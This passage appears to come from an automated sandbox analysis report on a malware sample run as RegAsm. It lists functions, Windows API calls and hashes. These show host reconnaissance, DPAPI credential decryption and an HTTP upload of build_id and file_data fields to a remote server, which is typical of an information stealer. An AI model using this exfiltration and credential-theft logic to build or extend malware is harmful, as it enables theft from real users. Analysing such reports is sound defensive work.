                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 0040F361
                                                                                                                                                                                                • Process32Next.KERNEL32(?,00000128), ref: 0040F3C9
                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 0040F3D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 599723951-0
                                                                                                                                                                                                • Opcode ID: 4f43f0c7911a1154bfe646faa6a16fe23ed6cdbbcadd1926e04f810d2c196b28
                                                                                                                                                                                                • Instruction ID: c4fd9f573cf2a468e9983291a0c5dbd1645898d3a40b29cc7e5dd950d5d90eba
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f43f0c7911a1154bfe646faa6a16fe23ed6cdbbcadd1926e04f810d2c196b28
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A213EB1A00118EBCB00EFA6C955AEEBBB9BF58304F00447FE405F3291D7784A08CB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F711 Relevance: 7.6, APIs: 5, Instructions: 62commemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoCreateInstance.OLE32(00426FE8,00000000,00000001,004253C8,00000000,?), ref: 0040F731
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0040F73F
                                                                                                                                                                                                • _wtoi64.MSVCRT ref: 0040F781
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0040F796
                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040F799
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1817501562-0
                                                                                                                                                                                                • Opcode ID: d3a1f175e1685076b102b1b7f0775a54b8c020bb750b008cfe05fffd5a1c668d
                                                                                                                                                                                                • Instruction ID: 59552c5b9146f1189dd7842dde150404ed07699bec92d6bc658d66da47dd67c6
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3a1f175e1685076b102b1b7f0775a54b8c020bb750b008cfe05fffd5a1c668d
                                                                                                                                                                                                • Instruction Fuzzy Hash: AB11AF34A04208BFCB10CBA4D848B9E7FB9EF85314F1480B9E804EB290C7759546CB15
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EC81 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ), ref: 0040EC92
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040EC99
                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040ECA8
                                                                                                                                                                                                • wsprintfA.USER32 ref: 0040ECC6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 362916592-0
                                                                                                                                                                                                • Opcode ID: 2e3287ed3af1feb30af53c9b9c4d426c3fa5f1ee3efbb3855964d411817bbda9
                                                                                                                                                                                                • Instruction ID: a36628a7c2d58b2f6a8fbbc7f1c23b5bd7a7466cb534b9c72913de06598764ad
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e3287ed3af1feb30af53c9b9c4d426c3fa5f1ee3efbb3855964d411817bbda9
                                                                                                                                                                                                • Instruction Fuzzy Hash: BEE09271700230BBEB1067A9AC0EF8A7B6E9B06725F101662FA15E31D0E6B499148AA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoSystemwsprintf
                                                                                                                                                                                                • String ID: DUB
                                                                                                                                                                                                • API String ID: 2452939696-3620500899
                                                                                                                                                                                                • Opcode ID: f6e27eb2a33337cf3594586a856b9315638d2e8638b889aa71f851cdbe3e74fd
                                                                                                                                                                                                • Instruction ID: 4cadcbb925f775794939d2490a6db27fd60e4d7a882d9f66ecbf72fabee37ffb
                                                                                                                                                                                                • Opcode Fuzzy Hash: f6e27eb2a33337cf3594586a856b9315638d2e8638b889aa71f851cdbe3e74fd
                                                                                                                                                                                                • Instruction Fuzzy Hash: A4D017B180011DDBCB10EBA0EC89A8977BCAB04208F4041A1AB04F2091E275A61E8FE9
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004062F1 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406314
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?), ref: 0040632C
                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040634A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2068576380-0
                                                                                                                                                                                                • Opcode ID: 764823c9ac877a078db8b65e299d83a800fd2afde2d0122a90243e7b0723ba22
                                                                                                                                                                                                • Instruction ID: c926f34c3fbc87d748c7763df8edb6c6524eb852c1bfaf8c96440898ae8a6f24
                                                                                                                                                                                                • Opcode Fuzzy Hash: 764823c9ac877a078db8b65e299d83a800fd2afde2d0122a90243e7b0723ba22
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0001FBBAA00218AFDB11DFE8DD8499EBBB9FF49604B100466FA11E7250D3759950CF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040EBBA Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041623D,00425507), ref: 0040EBC6
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,0041623D,00425507), ref: 0040EBCD
                                                                                                                                                                                                • GetUserNameA.ADVAPI32(00000000,?), ref: 0040EBE1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1206570057-0
                                                                                                                                                                                                • Opcode ID: 0fa6ae392cc66e0cae7273ce4a9161921302afa9a250ccfc8718fdd7b5d88d34
                                                                                                                                                                                                • Instruction ID: 41e13f3a823caf445703abcc8250ee773d697eaa9bb257bd13c4625bfa932f23
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fa6ae392cc66e0cae7273ce4a9161921302afa9a250ccfc8718fdd7b5d88d34
                                                                                                                                                                                                • Instruction Fuzzy Hash: 13D05BB9700148FBD7105795DD0DE9AB7BCD794755F400065FA01D2160D9F099458634
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004043CF Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 771stringnetworkmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 29 4043cf-4044ce _EH_prolog call 40e949 call 403a76 call 40fd97 call 40eb3c lstrlenA call 40eb3c call 40fd97 call 40e912 * 5 StrCmpCA 52 4044d0 29->52 53 4044d1-4044d6 29->53 52->53 54 4044f6-404616 call 40fb47 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40ea17 call 40ea8b call 40e9d0 call 40e97d * 3 call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 2 InternetConnectA 53->54 55 4044d8-4044f0 call 40eb3c InternetOpenA 53->55 60 404d29-404d66 call 40fa7f * 2 call 40eb03 * 4 call 40e949 54->60 125 40461c-40464f HttpOpenRequestA 54->125 55->54 55->60 88 404d6b-404dee call 40e97d * 9 60->88 126 404d20-404d23 InternetCloseHandle 125->126 127 404655-404657 125->127 126->60 128 404659-404669 InternetSetOptionA 127->128 129 40466f-404c76 call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 402101 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40eb3c lstrlenA call 40eb3c lstrlenA GetProcessHeap HeapAlloc call 40eb3c lstrlenA call 40eb3c memcpy call 40eb3c lstrlenA memcpy call 40eb3c lstrlenA call 40eb3c * 2 lstrlenA memcpy call 40eb3c lstrlenA call 40eb3c HttpSendRequestA call 40fa7f HttpQueryInfoA 127->129 128->129 336 404c78-404c85 call 40e912 129->336 337 404c8a-404c9c call 40fa62 129->337 336->88 342 404ca2-404ca7 337->342 343 404def-404dfc call 40e912 337->343 344 404ce3-404cf8 InternetReadFile 342->344 343->88 347 404ca9-404cae 344->347 348 404cfa-404d10 call 40eb3c StrCmpCA 344->348 347->348 349 404cb0-404cde call 40ea8b call 40e9d0 call 40e97d 347->349 354 404d12-404d13 ExitProcess 348->354 355 404d19-404d1a InternetCloseHandle 348->355 349->344 355->126
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004043D4
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404443
                                                                                                                                                                                                  • Part of subcall function 0040FD97: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040FDBB
                                                                                                                                                                                                  • Part of subcall function 0040FD97: GetProcessHeap.KERNEL32(00000000,?,?,00404437,?,?,?,?,?,?), ref: 0040FDC8
                                                                                                                                                                                                  • Part of subcall function 0040FD97: HeapAlloc.KERNEL32(00000000,?,00404437,?,?,?,?,?,?), ref: 0040FDCF
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004249DF,004249DB,004249D3,004249CF,004249CE), ref: 004044C6
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044E6
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040460B
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404645
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404669
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00424A98,00000000,?,?,00000000), ref: 00404B79
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404B8B
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B9D
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00404BA4
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404BB6
                                                                                                                                                                                                • memcpy.MSVCRT ref: 00404BC9
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BE0
                                                                                                                                                                                                • memcpy.MSVCRT ref: 00404BEA
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404BFB
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404C14
                                                                                                                                                                                                • memcpy.MSVCRT ref: 00404C21
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404C36
                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C47
                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C6E
                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CF0
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00404D08
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00404D13
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00404D23
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                                                                                                                                • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                • API String ID: 2658035217-3618031631
                                                                                                                                                                                                • Opcode ID: 74230ea3418a17fe7acd45192ab923381b60e63671642810837e76700d48b455
                                                                                                                                                                                                • Instruction ID: 83ec78a3498141f7689482851a51ba72a7f8a481cb099c92ac8b0ea39d2d89c8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 74230ea3418a17fe7acd45192ab923381b60e63671642810837e76700d48b455
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA6242B1800148EADB05EBE2C956EEEBBB8AF19304F1444AFE541731C2DB785B18DB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00405183 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 647networkstringmemoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
